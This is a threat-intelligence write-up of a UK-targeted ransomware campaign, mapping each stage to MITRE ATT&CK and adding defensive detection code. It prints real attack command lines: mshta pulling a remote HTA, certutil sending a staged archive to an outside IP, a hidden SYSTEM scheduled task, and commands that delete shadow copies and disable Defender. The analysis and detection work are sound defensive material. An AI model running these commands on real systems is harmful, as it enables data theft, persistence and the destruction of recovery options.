Threat Intel Analysis

Inside a Modern Ransomware Campaign: Anatomy of a Multi-Stage Attack

Ransomware campaigns targeting UK-based organisations have grown increasingly sophisticated over the past two years. What used to be opportunistic spray-and-pray operations have evolved into deliberate, multi-week intrusions with dedicated initial access brokers, affiliate programmes, and double-extortion playbooks. This post walks through the full kill chain of a campaign I tracked over Q4 2024 — from initial access through to the encryption event — mapping each stage to MITRE ATT&CK and pulling apart the tooling involved.

Note: All IOCs have been sanitised or generalised. This write-up is for educational purposes only.

Initial Access: The Phishing Lure

The campaign opened with a targeted spearphishing email sent to finance and HR staff at mid-sized logistics firms. The lure masqueraded as an urgent HMRC self-assessment document, complete with a convincing HTML email template. Attached was a password-protected ZIP containing an ISO file — a now-common technique to bypass Mark-of-the-Web (MotW) controls on Windows.

Inside the ISO sat a single .lnk shortcut file. When executed, it ran a mshta.exe one-liner pulling an HTA payload from an attacker-controlled domain registered just 48 hours prior:

mshta.exe http://cdn-updates[.]network/doc.hta

The HTA dropped a stager written in JScript that performed basic environment checks — looking for sandbox artefacts, VM vendor strings in the registry, and the presence of security tooling processes — before retrieving the second-stage payload. This kind of sandbox-aware staging is increasingly common and speaks to the professionalism of the group behind this campaign.

ATT&CK mapping: T1566.001 (Spearphishing Attachment), T1204.002 (User Execution: Malicious File), T1218.005 (Mshta)

Establishing Persistence: Cobalt Strike Beacon

The second stage was a Cobalt Strike Beacon configured to communicate over HTTPS on port 443, using a malleable C2 profile that mimicked Microsoft Teams traffic. The profile set the User-Agent to a legitimate Teams client string and structured the URI paths to match Teams API endpoints. This kind of traffic blending is designed to evade network-level detection.
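One defender-side check for the traffic blending described above, written as an added example rather than the author's tooling: parse proxy logs, pick out requests whose User-Agent claims to be the Teams client, and flag any whose destination leaves an assumed allowlist of Microsoft domains. The log format, host names, source IPs and allowlist are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed proxy log excerpt (not from the post). Assumed line format:
#   <timestamp> <src_ip> <method> <url> <status> "<user-agent>"
PROXY_LOG = """\
2024-11-04T09:12:01Z 10.0.5.21 GET https://teams.microsoft.com/api/mt/emea/beta/users/ 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Teams/1.6.00.4472"
2024-11-04T09:12:07Z 10.0.5.21 POST https://teams-cdn-sync.example/api/mt/emea/beta/users/ 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Teams/1.6.00.4472"
2024-11-04T09:13:40Z 10.0.5.33 GET https://statics.teams.cdn.office.net/hashedjs/app.js 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Teams/1.6.00.4472"
2024-11-04T09:14:02Z 10.0.5.33 GET https://www.gov.uk/self-assessment 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/130.0"
"""

LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
                    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$')
TEAMS_UA = re.compile(r'\bTeams/\d')        # the client string a malleable profile would copy
TEAMS_API_PATH = re.compile(r'^/api/mt/')  # URI prefix the profile mimicked (assumed)

# Assumed allowlist: domain suffixes a genuine Teams client actually talks to.
TEAMS_DOMAINS = ('microsoft.com', 'office.net', 'office.com', 'skype.com', 'microsoftonline.com')

def host_is_allowed(host):
    """True if host is one of the allowlisted domains or a subdomain of one."""
    host = host.lower()
    return any(host == d or host.endswith('.' + d) for d in TEAMS_DOMAINS)

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_spoofed_teams(log_text):
    """Flag requests that claim to be the Teams client but leave the Microsoft namespace."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not TEAMS_UA.search(rec['ua']):
            continue
        parts = urlsplit(rec['url'])
        host = parts.hostname or ''
        if host_is_allowed(host):
            continue
        hits.append({'ts': rec['ts'], 'src': rec['src'], 'host': host,
                     'mimics_teams_api_path': bool(TEAMS_API_PATH.match(parts.path))})
    return hits

if __name__ == '__main__':
    for h in find_spoofed_teams(PROXY_LOG):
        print(h)
```

A hit with mimics_teams_api_path set is the strongest signal, since a real client never sends Teams API paths to a non-Microsoft host.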

Beacon was injected into a legitimate svchost.exe process via process hollowing, and persistence was established through a scheduled task that executed a PowerShell script from a user-writable directory:

schtasks /create /tn "MicrosoftEdgeUpdate" /tr "powershell -w hidden -ep bypass -f C:\Users\Public\update.ps1" /sc onlogon /ru SYSTEM

The naming convention here — impersonating a browser update task — is a classic living-off-the-land technique. Defenders checking scheduled tasks will often skim past entries with familiar-sounding names, especially in busy environments.

ATT&CK mapping: T1055.012 (Process Hollowing), T1053.005 (Scheduled Task), T1071.001 (Web Protocols C2)

Discovery and Lateral Movement

Once a foothold was established, the operator spent approximately three days conducting internal reconnaissance before moving laterally. This dwell time is typical of ransomware-as-a-service (RaaS) affiliates who need to map the environment before deploying the final payload.

Discovery commands were run via Beacon's built-in capabilities and via net.exe calls to enumerate domain users, administrators, and trust relationships:

net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
nltest /domain_trusts
net view /all /domain

BloodHound data was collected using SharpHound, exfiltrated over the existing C2 channel, and used to identify the shortest privilege escalation paths to Domain Admin. In this case, a misconfigured Group Policy Object (GPO) applied to a sub-OU allowed any authenticated user to modify the GPO — a classic GenericWrite abuse path.

Lateral movement was conducted primarily through pass-the-hash (PTH) using harvested NTLM hashes from LSASS memory, dumped via a custom reflective DLL that avoided direct MiniDumpWriteDump calls to bypass common AV hooks. WMI was used to move between hosts:

wmic /node:TARGETHOST process call create "cmd /c whoami > C:\Windows\Temp\out.txt"

ATT&CK mapping: T1087.002 (Domain Account Discovery), T1484.001 (GPO Modification), T1550.002 (Pass the Hash), T1047 (WMI)
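Any single net command is routine admin noise; the recon above is easier to spot as a burst. The following added example (not from the post) scores each host on how many distinct discovery command families it runs inside a ten-minute window and alerts above a threshold. The events, host names, window and threshold are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (not from the post): (host, timestamp, command line).
EVENTS = [
    ('WS-FIN-07', '2024-11-06T10:02:11', 'net group "Domain Admins" /domain'),
    ('WS-FIN-07', '2024-11-06T10:02:19', 'net group "Enterprise Admins" /domain'),
    ('WS-FIN-07', '2024-11-06T10:02:40', 'nltest /domain_trusts'),
    ('WS-FIN-07', '2024-11-06T10:03:05', 'net view /all /domain'),
    ('WS-HR-02',  '2024-11-06T10:15:00', r'net view \\FILESERVER'),   # one-off lookup by a user
    ('WS-HR-02',  '2024-11-06T14:40:00', 'nltest /domain_trusts'),     # hours later: separate window
]

# Each pattern maps one command family from the post to a discovery "kind".
DISCOVERY_PATTERNS = {
    'net_group_domain': re.compile(r'^net1?(\.exe)?\s+group\b.*\s/domain\b', re.I),
    'net_user_domain':  re.compile(r'^net1?(\.exe)?\s+user\b.*\s/domain\b', re.I),
    'net_view':         re.compile(r'^net1?(\.exe)?\s+view\b', re.I),
    'nltest_trusts':    re.compile(r'^nltest(\.exe)?\s+/domain_trusts\b', re.I),
}

def classify(cmdline):
    """Return the discovery kind a command line belongs to, or None."""
    for kind, pat in DISCOVERY_PATTERNS.items():
        if pat.search(cmdline.strip()):
            return kind
    return None

def find_discovery_bursts(events, window=timedelta(minutes=10), threshold=3):
    """Alert when one host runs >= threshold distinct discovery kinds inside one window."""
    by_host = {}
    for host, ts, cmd in events:
        kind = classify(cmd)
        if kind:
            by_host.setdefault(host, []).append((datetime.fromisoformat(ts), kind, cmd))
    alerts = []
    for host, items in by_host.items():
        items.sort()
        for i, (start, _, _) in enumerate(items):   # slide the window from each event
            in_window = [it for it in items[i:] if it[0] - start <= window]
            kinds = {k for _, k, _ in in_window}
            if len(kinds) >= threshold:
                alerts.append({'host': host, 'start': start.isoformat(),
                               'kinds': sorted(kinds), 'commands': [c for _, _, c in in_window]})
                break  # one alert per host is enough for triage
    return alerts

if __name__ == '__main__':
    for a in find_discovery_bursts(EVENTS):
        print(a)
```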

Data Exfiltration

Prior to encryption — consistent with double-extortion tactics — the operators exfiltrated approximately 80GB of data. Sensitive directories targeted included finance shares, HR records, and project documentation. Data was staged locally in a compressed archive before being transferred out:

7za.exe a -p[REDACTED] -mmt4 staged.7z "\\FILESERVER\Finance\*"
certutil -urlcache -f -split http://185.x.x.x/upload.php staged.7z

The use of certutil for exfiltration is a well-documented LOLBIN technique. Despite its age, it continues to appear in real-world intrusions — presumably because many organisations still don't alert on it. The receiving infrastructure was hosted on a bulletproof hosting provider in Eastern Europe with no abuse response.

ATT&CK mapping: T1560.001 (Archive Collected Data), T1105 (Ingress Tool Transfer used inversely for exfil), T1048 (Exfiltration Over Alternative Protocol)

The Encryption Event

On day 11 of the intrusion, the ransomware payload was deployed. The binary — a variant consistent with the BlackCat/ALPHV affiliate ecosystem — was pushed via GPO to all domain-joined hosts and executed simultaneously. The payload used intermittent encryption (encrypting only portions of files) to maximise speed across the estate, completing encryption of roughly 2,000 endpoints in under four hours.

Volume shadow copies were deleted via vssadmin and wmic shadowcopy, and Windows Defender real-time protection was disabled via PowerShell prior to deployment:

Set-MpPreference -DisableRealtimeMonitoring $true
vssadmin delete shadows /all /quiet

Ransom notes were dropped to every encrypted directory, with a unique victim ID and a link to a .onion negotiation portal.

ATT&CK mapping: T1486 (Data Encrypted for Impact), T1490 (Inhibit System Recovery), T1562.001 (Impair Defenses)
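The command lines quoted through this post (the mshta one-liner, the hidden-window scheduled task, the certutil transfer, and the Defender and shadow-copy commands just above) each fit a narrow rule. As an added example that is not part of the original write-up, here they are expressed as regex detections over constructed Sysmon-style process-creation records, tagged with the ATT&CK IDs the post maps them to; the hosts, the TEST-NET IP standing in for the redacted 185.x.x.x address, and the benign control events are constructed.

```python
import re

# Constructed Sysmon Event ID 1 style records (not from the post): host and command line only.
EVENTS = [
    {'host': 'WS-FIN-07', 'cmdline': 'mshta.exe http://cdn-updates.network/doc.hta'},
    {'host': 'WS-FIN-07', 'cmdline': r'schtasks /create /tn "MicrosoftEdgeUpdate" /tr "powershell -w hidden -ep bypass -f C:\Users\Public\update.ps1" /sc onlogon /ru SYSTEM'},
    {'host': 'FILESERVER', 'cmdline': 'certutil -urlcache -f -split http://198.51.100.7/upload.php staged.7z'},
    {'host': 'DC01', 'cmdline': 'powershell Set-MpPreference -DisableRealtimeMonitoring $true'},
    {'host': 'DC01', 'cmdline': 'vssadmin delete shadows /all /quiet'},
    {'host': 'WS-HR-02', 'cmdline': 'certutil -verifystore My'},   # benign certutil use
    {'host': 'WS-HR-02', 'cmdline': r'schtasks /create /tn "Backup" /tr "C:\Program Files\Backup\run.exe" /sc daily'},
]

# Rules written from the command lines in the post, each with the technique the post maps it to.
RULES = [
    ('mshta_remote_hta', 'T1218.005',
     re.compile(r'\bmshta(\.exe)?\b.*\bhttps?://', re.I)),
    ('schtasks_hidden_powershell', 'T1053.005',
     re.compile(r'\bschtasks(\.exe)?\b.*/create\b.*\bpowershell\b.*'
                r'(-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass)', re.I)),
    ('certutil_urlcache', 'T1105',
     re.compile(r'\bcertutil(\.exe)?\b.*-urlcache\b', re.I)),
    ('defender_rtp_disabled', 'T1562.001',
     re.compile(r'Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true', re.I)),
    ('shadow_copy_deletion', 'T1490',
     re.compile(r'\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b|\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b', re.I)),
]
# Scripts launched from these locations deserve a second look regardless of task name.
USER_WRITABLE = re.compile(r'C:\\Users\\Public\\|\\AppData\\|\\Temp\\', re.I)

def match_rules(cmdline):
    """Return (rule, technique) pairs that fire on a single command line."""
    return [(name, tid) for name, tid, pat in RULES if pat.search(cmdline)]

def triage(events):
    """Run every rule over every event and note user-writable script paths."""
    findings = []
    for ev in events:
        for name, tid in match_rules(ev['cmdline']):
            findings.append({'host': ev['host'], 'rule': name, 'technique': tid,
                             'user_writable_path': bool(USER_WRITABLE.search(ev['cmdline'])),
                             'cmdline': ev['cmdline']})
    return findings

def techniques_by_host(findings):
    """Collapse findings into the set of techniques seen per host (the kill-chain view)."""
    out = {}
    for f in findings:
        out.setdefault(f['host'], set()).add(f['technique'])
    return out
```

A host accumulating several of these techniques in sequence is the kill chain described in this post; each rule alone is a tip-off, together they are the timeline.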

Observations and Takeaways

A few things stand out about this campaign when viewed end-to-end:

  • The dwell time is the opportunity. Eleven days between initial access and encryption is plenty of time for defenders to detect and evict. Most of the early-stage activity — HTA execution, scheduled task creation, SMB lateral movement — generates events that are visible in Windows Event Logs and EDR telemetry. The question is always whether anyone is looking.
  • Living-off-the-land is the norm, not the exception. The operators leaned heavily on built-in Windows utilities throughout. Detections that rely solely on signature-based AV will miss the bulk of this activity.
  • GPO misconfiguration was the pivot point. A single over-permissioned GPO enabled domain compromise. Running BloodHound regularly in your own environment to find these paths before an attacker does is time well spent.
  • Double extortion changes the recovery calculus. Even organisations with solid backups face significant pressure once sensitive data is in the attacker's hands. Data loss prevention and egress monitoring matter as much as endpoint detection here.

If you're running threat hunts on the back of this, the early indicators — ISO/LNK delivery, mshta network connections, schtasks with suspicious names, and SharpHound artefacts on disk — are your best chances of catching the intrusion before it reaches the encryption stage.